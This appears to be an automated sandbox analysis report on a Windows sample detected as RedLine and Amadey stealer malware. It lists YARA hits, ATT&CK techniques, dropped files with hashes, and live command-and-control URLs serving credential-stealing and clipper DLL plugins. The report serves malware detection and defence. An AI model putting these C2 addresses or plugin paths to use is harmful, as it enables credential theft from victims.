                            Source: Yara matchFile source: 00000010.00000002.785140671.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000000.409483823.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000000.400766948.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000000.773987737.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000002.774229388.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.261384983.0000000004B55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, type: DROPPED
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 00000010.00000002.785793369.000000000113A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.785793369.00000000010FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: mnolyk.exe PID: 4184, type: MEMORYSTR
                            Source: Yara matchFile source: 28.2.rundll32.exe.6f690000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clip64[1].dll, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED

                            Remote Access Functionality

                            Source: Yara matchFile source: 2.2.amMl.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.amMl.exe.5b0e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.amMl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.3.amMl.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000003.343232585.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Valid Accounts | 3 Native API | 1 Windows Service | 2 Bypass User Access Control | 21 Disable or Modify Tools | 1 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 14 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot |
| Default Accounts | 2 Command and Scripting Interpreter | 1 Scheduled Task/Job | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Input Capture | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
                            Domain Accounts1
                            Scheduled Task/Job
                            1
                            Registry Run Keys / Startup Folder
                            1
                            Windows Service
                            2
                            Obfuscated Files or Information
                            Security Account Manager2
                            File and Directory Discovery
                            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                            Non-Application Layer Protocol
                            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts1
                            Service Execution
                            1
                            Services File Permissions Weakness
                            111
                            Process Injection
                            2
                            Software Packing
                            NTDS36
                            System Information Discovery
                            Distributed Component Object ModelInput CaptureScheduled Transfer113
                            Application Layer Protocol
                            SIM Card SwapCarrier Billing Fraud
                            Cloud AccountsCronNetwork Logon Script1
                            Scheduled Task/Job
                            1
                            Timestomp
                            LSA Secrets31
                            Security Software Discovery
                            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable MediaLaunchdRc.common1
                            Registry Run Keys / Startup Folder
                            2
                            Bypass User Access Control
                            Cached Domain Credentials21
                            Virtualization/Sandbox Evasion
                            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup Items1
                            Services File Permissions Weakness
                            1
                            Masquerading
                            DCSync2
                            Process Discovery
                            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
                            Virtualization/Sandbox Evasion
                            Proc Filesystem1
                            System Owner/User Discovery
                            Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Access Token Manipulation
                            /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)111
                            Process Injection
                            Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                            Services File Permissions Weakness
                            Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                            Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
                            Rundll32
                            KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                            Behavior Graph ID: 802001, Sample: file.exe, Startdate: 08/02/2023, Architecture: WINDOWS, Score: 100 (behavior graph image not reproduced)

                            Source | Detection | Scanner | Label | Link
                            file.exe | 67% | ReversingLabs | Win32.Spyware.RedLine
                            file.exe | 100% | Joe Sandbox ML
                            Source | Detection | Scanner | Label | Link
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe | 100% | Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe | 100% | Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe | 100% | Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | 100% | Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe | 100% | Joe Sandbox ML
                            No Antivirus matches
                            No Antivirus matches
                            Source | Detection | Scanner | Label | Link
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dll | 0% | URL Reputation | safe
                            http://62.204.41.4/Gol478Ns/index.phpm0 | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dllG | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.php342a2 | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.phpyux | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Golol478Ns/index.php | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/Plugins/clip64.dll | 100% | URL Reputation | malware
                            http://62.204.41.4/Gol478Ns/index.phptch | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.phpc | 0% | Avira URL Cloud | safe
                            62.204.41.4/Gol478Ns/index.php | 100% | URL Reputation | malware
                            http://62.204.41.4/Gol478Ns/index.phpIo | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.php | 100% | URL Reputation | malware
                            http://62.204.41.4/Gol478Ns/index.php. | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.phpe | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.phpFo | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.phprundll32.exel | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.phprundll32.exe | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.phpt | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.php2 | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.phpL | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.phpe5342a2 | 0% | Avira URL Cloud | safe
                            No contacted domains info
                            Name | Malicious | Antivirus Detection | Reputation
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dll | true | URL Reputation: safe | unknown
                            http://62.204.41.4/Gol478Ns/Plugins/clip64.dll | true | URL Reputation: malware | unknown
                            62.204.41.4/Gol478Ns/index.php | true | URL Reputation: malware | low
                            http://62.204.41.4/Gol478Ns/index.php | true | URL Reputation: malware | unknown
                            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                            62.204.41.4 | unknown | United Kingdom | | 30798 | TNNET-ASTNNetOyMainnetworkFI | true
                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:802001
                            Start date and time:2023-02-08 21:27:22 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 14m 25s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of new started processes analysed:37
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample file name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@37/14@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 41.2% (good quality ratio 39.5%)
                            • Quality average: 85%
                            • Quality standard deviation: 24.3%
                            HCA Information:
                            • Successful, ratio: 90%
                            • Number of executed functions: 101
                            • Number of non-executed functions: 134
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240s for rundll32
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com
                            • Not all processes were analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            Time | Type | Description
                            21:31:08 | API Interceptor | 1989x Sleep call for process: mnolyk.exe modified
                            21:31:10 | Task Scheduler | Run new task: mnolyk.exe path: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                            62.204.41.4 | file.exe | | malicious | | 62.204.41.4/Gol478Ns/index.php
                            No context
                            Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                            TNNET-ASTNNetOyMainnetworkFI | file.exe | | malicious | | 62.204.41.4
                            TNNET-ASTNNetOyMainnetworkFI | klXwCWqTsX.exe | | malicious | | 62.204.41.5
                            No context
                            Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clip64[1].dll | file.exe | | malicious | |
                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):226
                                                                    Entropy (8bit):5.354940450065058
                                                                    Encrypted:false
                                                                    SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                    MD5:B10E37251C5B495643F331DB2EEC3394
                                                                    SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                    SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                    SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):321
                                                                    Entropy (8bit):5.355221377978991
                                                                    Encrypted:false
                                                                    SSDEEP:6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
                                                                    MD5:03C5BA5FCE7124B503EA65EF522177C3
                                                                    SHA1:F76B1F538D5EA66664355901E927B2F870ACCDD8
                                                                    SHA-256:8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
                                                                    SHA-512:151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                                    Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):91136
                                                                    Entropy (8bit):6.3469756750979025
                                                                    Encrypted:false
                                                                    SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                                                                    MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                                                                    SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                                                                    SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                                                                    SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clip64[1].dll, Author: Joe Security
                                                                    Joe Sandbox View:
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):241664
                                                                    Entropy (8bit):6.368190069123744
                                                                    Encrypted:false
                                                                    SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                                                                    MD5:8BB923C4D81284DAEF7896E5682DF6C6
                                                                    SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                                                                    SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                                                                    SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):391168
                                                                    Entropy (8bit):7.696590302349953
                                                                    Encrypted:false
                                                                    SSDEEP:6144:Ksy+bnr+2p0yN90QELcyqDU1HID5nWBoxGGkH2OA+tBMIms+zrnZR6z8d6Q:AMrWy90ZmDU1oABZGkWORr/+5RV4Q
                                                                    MD5:03D901B08C7DE9A3C6323A8C6DF73569
                                                                    SHA1:509117A267058FDE7DDEBCC55C6029BF4DFED936
                                                                    SHA-256:78FFBAB40C309B39013483768AD835FFE1466341E7766419623E47121796F75A
                                                                    SHA-512:B3903E6BB9ADA0600BE11F16C1A7A1AF78EECE2122BEE99518D216A0DCDA902FBC1577BF792951B7646C1380813E8CED8924178D410B373D723D4683255371D5
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):241664
                                                                    Entropy (8bit):6.368190069123744
                                                                    Encrypted:false
                                                                    SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                                                                    MD5:8BB923C4D81284DAEF7896E5682DF6C6
                                                                    SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                                                                    SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                                                                    SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):372736
                                                                    Entropy (8bit):6.535399889112572
                                                                    Encrypted:false
                                                                    SSDEEP:6144:XkBx5F9AZ8UYK7uj8YCe6SjiELiqc++vJ:XIZAZ88ij8YvDjiYunJ
                                                                    MD5:AD3805672C5FE617D88DCE7E50E56B9F
                                                                    SHA1:B2DA5262E12A8AA60FB08406520D81F4B05695E8
                                                                    SHA-256:731CCE27B96AD4396F53F718EBE59A9F1096D4EB7DA50753B83F04503CE63B6D
                                                                    SHA-512:4B56CFE1452BEEF687706F801D1E0EFDBC84487B3587AD545DA2D2A39862F07F5C6B4F62F527F9B6C9961A32C7A223162DA1425DE6F02919ACE2868C770BEAFB
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):11264
                                                                    Entropy (8bit):4.97029807367379
                                                                    Encrypted:false
                                                                    SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                                                    MD5:7E93BACBBC33E6652E147E7FE07572A0
                                                                    SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                                                                    SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                                                                    SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):91136
                                                                    Entropy (8bit):6.3469756750979025
                                                                    Encrypted:false
                                                                    SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                                                                    MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                                                                    SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                                                                    SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                                                                    SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
                                                                    Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    File Type:HTML document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):162
                                                                    Entropy (8bit):4.621829903792328
                                                                    Encrypted:false
                                                                    SSDEEP:3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPROZ/eIwcWWGu:q43tIkObRHXiMIWObtklI5LPROeIpfGu
                                                                    MD5:1B7C22A214949975556626D7217E9A39
                                                                    SHA1:D01C97E2944166ED23E47E4A62FF471AB8FA031F
                                                                    SHA-256:340C8464C2007CE3F80682E15DFAFA4180B641D53C14201B929906B7B0284D87
                                                                    SHA-512:BA64847CF1D4157D50ABE4F4A1E5C1996FE387C5808E2F758C7FB3213BFEFE1F3712D343F0C30A16819749840954654A70611D2250FD0F7B032429DB7AFD2CC5
                                                                    Malicious:false
                                                                    Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>..
                                                                    Process:C:\Windows\SysWOW64\cacls.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):15
                                                                    Entropy (8bit):3.240223928941852
                                                                    Encrypted:false
                                                                    SSDEEP:3:o3F:o1
                                                                    MD5:509B054634B6DE74F111C3E646BC80FD
                                                                    SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                                                                    SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                                                                    SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                                                                    Malicious:false
                                                                    Preview:processed dir:
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.83021524008986
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:file.exe
                                                                    File size:582144
                                                                    MD5:392470d5b5723c386b943751c15721a6
                                                                    SHA1:83491316d575cc2a867224532fe25e016d8c3f43
                                                                    SHA256:fd0d72d174c13185267e7e38ac8faf1e5b646e5852645e83dcc12a028214a707
                                                                    SHA512:ea71470597d021a0f0cf727ff5c3d3798ddb58d91ee279e62740482452acd790998716cb3a230ee9aef5d1e9a8d5e5027921ac9dab7740a2fcc16c53ca06d299
                                                                    SSDEEP:12288:eMroy908TE1aEzFLw/64P8A3MykWO2r/+hdd4u1QxgKj:Gy9I7FL7aRvLpr/EUGQ1j
                                                                    TLSH:D0C40217A7ED5022E4B967B018F703C70B37BEA11B35C657278F695A1C732A4A23532B
                                                                    Icon Hash:f8e0e4e8ecccc870
                                                                    Entrypoint:0x406a60
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:10
                                                                    OS Version Minor:0
                                                                    File Version Major:10
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:10
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                                    Instruction
                                                                    call 00007F74C4AD43D5h
                                                                    jmp 00007F74C4AD3CE5h
                                                                    push 00000058h
                                                                    push 004072B8h
                                                                    call 00007F74C4AD4477h
                                                                    xor ebx, ebx
                                                                    mov dword ptr [ebp-20h], ebx
                                                                    lea eax, dword ptr [ebp-68h]
                                                                    push eax
                                                                    call dword ptr [0040A184h]
                                                                    mov dword ptr [ebp-04h], ebx
                                                                    mov eax, dword ptr fs:[00000018h]
                                                                    mov esi, dword ptr [eax+04h]
                                                                    mov edi, ebx
                                                                    mov edx, 004088ACh
                                                                    mov ecx, esi
                                                                    xor eax, eax
                                                                    lock cmpxchg dword ptr [edx], ecx
                                                                    test eax, eax
                                                                    je 00007F74C4AD3CFAh
                                                                    cmp eax, esi
                                                                    jne 00007F74C4AD3CE9h
                                                                    xor esi, esi
                                                                    inc esi
                                                                    mov edi, esi
                                                                    jmp 00007F74C4AD3CF2h
                                                                    push 000003E8h
                                                                    call dword ptr [0040A188h]
                                                                    jmp 00007F74C4AD3CB9h
                                                                    xor esi, esi
                                                                    inc esi
                                                                    cmp dword ptr [004088B0h], esi
                                                                    jne 00007F74C4AD3CECh
                                                                    push 0000001Fh
                                                                    call 00007F74C4AD420Bh
                                                                    pop ecx
                                                                    jmp 00007F74C4AD3D1Ch
                                                                    cmp dword ptr [004088B0h], ebx
                                                                    jne 00007F74C4AD3D0Eh
                                                                    mov dword ptr [004088B0h], esi
                                                                    push 004010C4h
                                                                    push 004010B8h
                                                                    call 00007F74C4AD3E36h
                                                                    pop ecx
                                                                    pop ecx
                                                                    test eax, eax
                                                                    je 00007F74C4AD3CF9h
                                                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                                                    mov eax, 000000FFh
                                                                    jmp 00007F74C4AD3E19h
                                                                    mov dword ptr [004081E4h], esi
                                                                    cmp dword ptr [004088B0h], esi
                                                                    jne 00007F74C4AD3CFDh
                                                                    push 004010B4h
                                                                    push 004010ACh
                                                                    call 00007F74C4AD43C5h
                                                                    pop ecx
                                                                    pop ecx
                                                                    mov dword ptr [000088B0h], 00000000h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa28c | 0xb4 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x85ba8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x92000 | 0x888 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1410 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1008 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x288 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
